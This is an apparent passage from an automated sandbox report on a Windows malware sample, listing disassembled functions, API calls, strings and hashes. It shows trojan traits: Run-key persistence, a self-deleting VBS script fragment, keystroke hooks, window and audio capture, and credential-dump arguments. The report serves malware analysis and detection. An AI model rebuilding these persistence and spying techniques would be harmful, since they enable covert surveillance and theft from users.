String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-332907002
Opcode ID: b4ad2fe907f683c4574643f9a94cb9fabd582ef51e0f8c485010ca73aa315bfd
Instruction ID: 41ae5eec8d8c852c0cc3c178e0f1137f2a0bda96d0f509e590d0bd6d09efdebf
Opcode Fuzzy Hash: b4ad2fe907f683c4574643f9a94cb9fabd582ef51e0f8c485010ca73aa315bfd
Instruction Fuzzy Hash: CB91B4716082005AC315FB62D892AAF77A9AF90309F10443FB54AA31E3FF7C9D49C65E

Uniqueness

Uniqueness Score: -1.00%

Function 0040CFE4 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041279E: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F816), ref: 004127AE
Part of subcall function 0041279E: WaitForSingleObject.KERNEL32(000000FF), ref: 004127C1

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D0F3
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D106
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D136
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D145

Part of subcall function 0040B7FA: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D006,004752D8,004752F0,?,pth_unenc), ref: 0040B809
Part of subcall function 0040B7FA: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B815
Part of subcall function 0040B7FA: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B823

Part of subcall function 0041B8C6: GetCurrentProcessId.KERNEL32(00000000,7782FBB0,00000000,?,?,?,?,00466468,0040D15B,.vbs,?,?,?,?,?,004752F0), ref: 0041B8ED

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D360
ExitProcess.KERNEL32 ref: 0040D367

Strings

fso.DeleteFile ", xrefs: 0040D263
.vbs, xrefs: 0040D14F
dMG, xrefs: 0040D01F
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D30F
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D086
exepath, xrefs: 0040D0CF
Temp, xrefs: 0040D194
fso.DeleteFolder ", xrefs: 0040D2D8
On Error Resume Next, xrefs: 0040D1E2
pth_unenc, xrefs: 0040CFEA
while fso.FileExists(", xrefs: 0040D216
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D035
8SG, xrefs: 0040D0AC
hpF, xrefs: 0040D2DD
"), xrefs: 0040D1FF
open, xrefs: 0040D35A
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D1D3
wend, xrefs: 0040D2B2

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-2557013105
Opcode ID: e14672d76131e3465f8f58df1f8aaca31c2fc8196c5921b6896a948eecdb4e6d
Instruction ID: 8b66d43f73e9098c463d934601f02000e5e1a777e94df9333dfdffdf5747c3a2
Opcode Fuzzy Hash: e14672d76131e3465f8f58df1f8aaca31c2fc8196c5921b6896a948eecdb4e6d
Instruction Fuzzy Hash: C381AF716082005BC719FB22D852AAF77A9AFD1308F10483FB14A671E2EF7C9D49C65E

Uniqueness

Uniqueness Score: -1.00%

Function 004123C3 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004123E2
ExitProcess.KERNEL32(00000000), ref: 004123EE
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412468
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412477
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412482
CloseHandle.KERNEL32(00000000), ref: 00412489
GetCurrentProcessId.KERNEL32 ref: 0041248F
PathFileExistsW.SHLWAPI(?), ref: 004124C0
GetTempPathW.KERNEL32(00000104,?), ref: 00412523
GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041253D
lstrcatW.KERNEL32(?,.exe), ref: 0041254F

Part of subcall function 0041C33F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D347,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C37E

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041258F
Sleep.KERNEL32(000001F4), ref: 004125D0
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004125E5
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004125F0
CloseHandle.KERNEL32(00000000), ref: 004125F7
GetCurrentProcessId.KERNEL32 ref: 004125FD

Strings

temp_, xrefs: 00412531
exepath, xrefs: 0041241A
8SG, xrefs: 004123F4
WDH, xrefs: 00412496, 00412604
open, xrefs: 00412589
.exe, xrefs: 00412543

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
String ID: .exe$8SG$WDH$exepath$open$temp_
API String ID: 2649220323-436679193
Opcode ID: 9f2b8ccfe80d972c1099c6e698ebda80368bb01183b921761bdf034cc0064ffe
Instruction ID: 8ef474c935fd0aa6f7fd22daa97b647f48f9d568775161eff7735b799635912c
Opcode Fuzzy Hash: 9f2b8ccfe80d972c1099c6e698ebda80368bb01183b921761bdf034cc0064ffe
Instruction Fuzzy Hash: 0B51A671A00315BBDB10ABA09D99AEE336D9B04715F10446BF901E71D2EFBC8E85865D

Uniqueness

Uniqueness Score: -1.00%

Function 0041AF95 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B08A
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B09E
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B0C6
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B0DC
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B11D
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B135
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B14A
SetEvent.KERNEL32 ref: 0041B167
WaitForSingleObject.KERNEL32(000001F4), ref: 0041B178
CloseHandle.KERNEL32 ref: 0041B188
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B1AA
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B1B4

Strings

play audio, xrefs: 0041B099
NG, xrefs: 0041B057, 0041AFD9
close audio, xrefs: 0041B1AF
alias audio, xrefs: 0041B006
pause audio, xrefs: 0041B118
resume audio, xrefs: 0041B130
stop audio, xrefs: 0041B1A5
" type , xrefs: 0041B023
status audio mode, xrefs: 0041B145
open ", xrefs: 0041B01E
stopped, xrefs: 0041B150

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
API String ID: 738084811-2094122233
Opcode ID: 2a7ffd031394d11ac2506a3841417e646b0b4c90081be383c47fe004e03838fc
Instruction ID: 48557ae7e310582626121f23f7169a642ba8ba4df6540ddaacaa5f45de19cc96
Opcode Fuzzy Hash: 2a7ffd031394d11ac2506a3841417e646b0b4c90081be383c47fe004e03838fc
Instruction Fuzzy Hash: A65183B12442056AD315B731DC96EBB779CEB84359F10043FF14A621E2EF788D498A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7

Strings

data, xrefs: 00401BB1
fmt , xrefs: 00401B2D
RIFF, xrefs: 00401AFD
WAVE, xrefs: 00401B1D

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3

Uniqueness

Uniqueness Score: -1.00%

Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\yaALNupJCH.exe,00000001,0040764D,C:\Users\user\Desktop\yaALNupJCH.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
GetProcAddress.KERNEL32(00000000), ref: 0040728D
GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
GetProcAddress.KERNEL32(00000000), ref: 004072A5
GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
GetProcAddress.KERNEL32(00000000), ref: 004072B9
GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
GetProcAddress.KERNEL32(00000000), ref: 004072CD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
GetProcAddress.KERNEL32(00000000), ref: 004072E1
GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
GetProcAddress.KERNEL32(00000000), ref: 004072F5

Strings

NtFreeVirtualMemory, xrefs: 004072B0
NtAllocateVirtualMemory, xrefs: 0040729C
RtlInitUnicodeString, xrefs: 0040727E
RtlAcquirePebLock, xrefs: 004072C4
C:\Users\user\Desktop\yaALNupJCH.exe, xrefs: 00407271
RtlReleasePebLock, xrefs: 004072D8
LdrEnumerateLoadedModules, xrefs: 004072EC
ntdll.dll, xrefs: 00407278, 00407283, 004072A1, 004072B5, 004072C9, 004072DD, 004072F1

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Users\user\Desktop\yaALNupJCH.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
API String ID: 1646373207-1095183327
Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD47 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040CD55
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CD6E
CopyFileW.KERNEL32(C:\Users\user\Desktop\yaALNupJCH.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CE1E
_wcslen.LIBCMT ref: 0040CE34
CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CEBC
CopyFileW.KERNEL32(C:\Users\user\Desktop\yaALNupJCH.exe,00000000,00000000), ref: 0040CED2
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CF11
_wcslen.LIBCMT ref: 0040CF14
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CF2B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040CF7B
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040CF99
ExitProcess.KERNEL32 ref: 0040CFB0

Strings

C:\Users\user\Desktop\yaALNupJCH.exe, xrefs: 0040CDDF, 0040CDE4, 0040CE17, 0040CECC, 0040CED1, 0040CED8, 0040CF39
del, xrefs: 0040CF43
6, xrefs: 0040CE28
open, xrefs: 0040CF92

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
String ID: 6$C:\Users\user\Desktop\yaALNupJCH.exe$del$open
API String ID: 1579085052-1230562670
Opcode ID: d7e0deb7c1df92f36f4db919fc40f4064fea54d51c41b90f377997a553d1487b
Instruction ID: 4aa6f52345204f9d3ba8f621bb5a02f3c2425994bcf3c33b54a52c403d9a3db8
Opcode Fuzzy Hash: d7e0deb7c1df92f36f4db919fc40f4064fea54d51c41b90f377997a553d1487b
Instruction Fuzzy Hash: BB51E560208301ABD609B726DC92E7F679D9F84719F10443FF609A62E3EF7C9D04866E

Uniqueness

Uniqueness Score: -1.00%

Function 0041BF69 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0041BF84
_memcmp.LIBVCRUNTIME ref: 0041BF9C
lstrlenW.KERNEL32(?), ref: 0041BFB5
FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041BFF0
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C003
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C047
lstrcmpW.KERNEL32(?,?), ref: 0041C062
FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C07A
_wcslen.LIBCMT ref: 0041C089
FindVolumeClose.KERNEL32(?), ref: 0041C0A9
GetLastError.KERNEL32 ref: 0041C0C1
GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C0EE
lstrcatW.KERNEL32(?,?), ref: 0041C107
lstrcpyW.KERNEL32 ref: 0041C116
GetLastError.KERNEL32 ref: 0041C11E

Strings

?, xrefs: 0041C01B

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
String ID: ?
API String ID: 3941738427-1684325040
Opcode ID: 715a33eef8a2faa7816bc5fce87db8e969b2932189cd6cfa065d3aae50eb1d12
Instruction ID: ebba18ca6bfbe9900a9076ea91f3c8992c365883813dc3c2e4c5b1ddc1dd106d
Opcode Fuzzy Hash: 715a33eef8a2faa7816bc5fce87db8e969b2932189cd6cfa065d3aae50eb1d12
Instruction Fuzzy Hash: 7B416171544306EBD720DFA0DC88ADB7BECAF48355F10092BF545C2261EB78C988CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0044F36E Relevance: 25.9, APIs: 17, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F400
_free.LIBCMT ref: 0044F426
_free.LIBCMT ref: 0044F44F
_free.LIBCMT ref: 0044F487
_free.LIBCMT ref: 0044F4B8
_free.LIBCMT ref: 0044F4F9
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044F57A
_free.LIBCMT ref: 0044F593
_wcschr.LIBVCRUNTIME ref: 0044F5D0
_free.LIBCMT ref: 0044F63C
_free.LIBCMT ref: 0044F662
_free.LIBCMT ref: 0044F68B
_free.LIBCMT ref: 0044F6C0
_free.LIBCMT ref: 0044F6F1
_free.LIBCMT ref: 0044F732
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F7B7
_free.LIBCMT ref: 0044F7D0

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$_wcschr
String ID:
API String ID: 3899193279-0
Opcode ID: e59a5d4720be3735c3583ecc21b3002b3d05f929497f546d3460778b80b6eaf5
Instruction ID: 8bf2c607ebde511f1b434109d64c34b6cdbb8d28cf40a594a9c763835df0f646
Opcode Fuzzy Hash: e59a5d4720be3735c3583ecc21b3002b3d05f929497f546d3460778b80b6eaf5
Instruction Fuzzy Hash: 9DD13771D003006FFB24AF759D42A6B77A8EF01354F16417FE905A7382EA3D990A8B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00412A02 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412A1B

Part of subcall function 0041B8C6: GetCurrentProcessId.KERNEL32(00000000,7782FBB0,00000000,?,?,?,?,00466468,0040D15B,.vbs,?,?,?,?,?,004752F0), ref: 0041B8ED

Part of subcall function 004184B6: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 004184CC
Part of subcall function 004184B6: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 004184D5

Sleep.KERNEL32(0000000A,00465E74), ref: 00412B6D
Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412C0F
Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412CB1
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412D13
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412D4A
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412D86
Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412DA0
Sleep.KERNEL32(00000064), ref: 00412DE2

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

NG, xrefs: 0041300F
/stext ", xrefs: 00412AF8, 00412B9A, 00412C3C
NG, xrefs: 00412EBA
0TG, xrefs: 00412F74
0TG, xrefs: 0041309A

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: /stext "$0TG$0TG$NG$NG
API String ID: 1223786279-2576077980
Opcode ID: 979841e0768e4e9b6a1fdcaa430d89e1a82e99aac13d4eb410628141a9d0f94e
Instruction ID: a1c1eebc7225e2a3af2bf9f674dd4b331a6a22bbf8d2d11b3d3d95dca56a63f0
Opcode Fuzzy Hash: 979841e0768e4e9b6a1fdcaa430d89e1a82e99aac13d4eb410628141a9d0f94e
Instruction Fuzzy Hash: E70256315083415AC325FB22D891AEFB3E5AFD4348F50483EF58A931E2EF78598DC64A

Uniqueness

Uniqueness Score: -1.00%

Function 00414CD4 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32 ref: 00414D23
LoadLibraryA.KERNEL32(?), ref: 00414D65
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414D85
FreeLibrary.KERNEL32(00000000), ref: 00414D8C
LoadLibraryA.KERNEL32(?), ref: 00414DC4
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414DD6
FreeLibrary.KERNEL32(00000000), ref: 00414DDD
GetProcAddress.KERNEL32(00000000,?), ref: 00414DEC
FreeLibrary.KERNEL32(00000000), ref: 00414E03

Strings

\ws2_32, xrefs: 00414D4D
getnameinfo, xrefs: 00414CF0
freeaddrinfo, xrefs: 00414D00
\wship6, xrefs: 00414DAC
getaddrinfo, xrefs: 00414CE1, 00414D7F, 00414DD0

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
API String ID: 2490988753-744132762
Opcode ID: 8bee0785508e6c960bcbf0281b12361e544454b7fefe14523764ee1ecffa666c
Instruction ID: 871d15ce04c65df1b42d9b9bb68fd0349182852438c0ab10db097056de8955f1
Opcode Fuzzy Hash: 8bee0785508e6c960bcbf0281b12361e544454b7fefe14523764ee1ecffa666c
Instruction Fuzzy Hash: 6F31D3B1A01315ABC720AB65DC84EDFB7DCAF84754F40092BF85893211E778D9858AEE

Uniqueness

Uniqueness Score: -1.00%

Function 0041C5DD Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C5FF
RegEnumKeyExA.ADVAPI32 ref: 0041C643
RegCloseKey.ADVAPI32(?), ref: 0041C90D

Strings

Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C5F5
UninstallString, xrefs: 0041C6F2
DisplayName, xrefs: 0041C68A
InstallDate, xrefs: 0041C6DE
Publisher, xrefs: 0041C69F
DisplayVersion, xrefs: 0041C6B6
InstallLocation, xrefs: 0041C6CA

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: 253e9a839a2d3a9543dcebbd2a5c8e5dff626512c864a7405e8cfc213360fc2c
Instruction ID: b4b41d76fea16dc8d6548a96d897c20ecb83427c766ff7297069692ec6cda10a
Opcode Fuzzy Hash: 253e9a839a2d3a9543dcebbd2a5c8e5dff626512c864a7405e8cfc213360fc2c
Instruction Fuzzy Hash: 838154311082459BC325EF11D851EEFB7E8BF94309F10482FB589921A1FF34AA49CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC24 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 156sleepCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040AC86
Sleep.KERNEL32(000001F4), ref: 0040AC91
GetForegroundWindow.USER32 ref: 0040AC97
GetWindowTextLengthW.USER32(00000000), ref: 0040ACA0
GetWindowTextW.USER32 ref: 0040ACD4
Sleep.KERNEL32(000003E8), ref: 0040ADA2

Part of subcall function 0040A584: SetEvent.KERNEL32(?,?,00000000,0040B158,00000000), ref: 0040A5B0

Strings

], xrefs: 0040AD36
lG, xrefs: 0040ACDA
{ User has been idle for , xrefs: 0040ADD4
lG, xrefs: 0040AC6B
minutes }, xrefs: 0040ADC8
[, xrefs: 0040AD3C
lG, xrefs: 0040ACF0

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$]$lG$lG$lG
API String ID: 911427763-790354841
Opcode ID: 690bf1f7550bafbcfa9a4fa22f376934340438e36a94d4c2ee60a085dd43089b
Instruction ID: a6336e939aeddfcf0e53b46632b03f7586de99f06c4f75a03a301e66baf156ba
Opcode Fuzzy Hash: 690bf1f7550bafbcfa9a4fa22f376934340438e36a94d4c2ee60a085dd43089b
Instruction Fuzzy Hash: 145190716043409BD314FB31D856AAE77A6AF84308F40093FF586A22E2EF7C9955C69F

Uniqueness

Uniqueness Score: -1.00%

Function 0041D4DD Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D528
GetCursorPos.USER32(?), ref: 0041D537
SetForegroundWindow.USER32(?), ref: 0041D540
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D55A
Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D5AB
ExitProcess.KERNEL32 ref: 0041D5B3
CreatePopupMenu.USER32 ref: 0041D5B9
AppendMenuA.USER32 ref: 0041D5CE

Strings

Close, xrefs: 0041D5BF

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction ID: e2a929e8b8d8ae91c23b191118bc4d50e56676cab0c381e7b4c0254b0064898e
Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction Fuzzy Hash: D22119B1544209FFDB094F64ED0EAAA3F76FB08306F004125F506951B2DB75DEA1EB29

Uniqueness

Uniqueness Score: -1.00%

Function 00CC2431 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

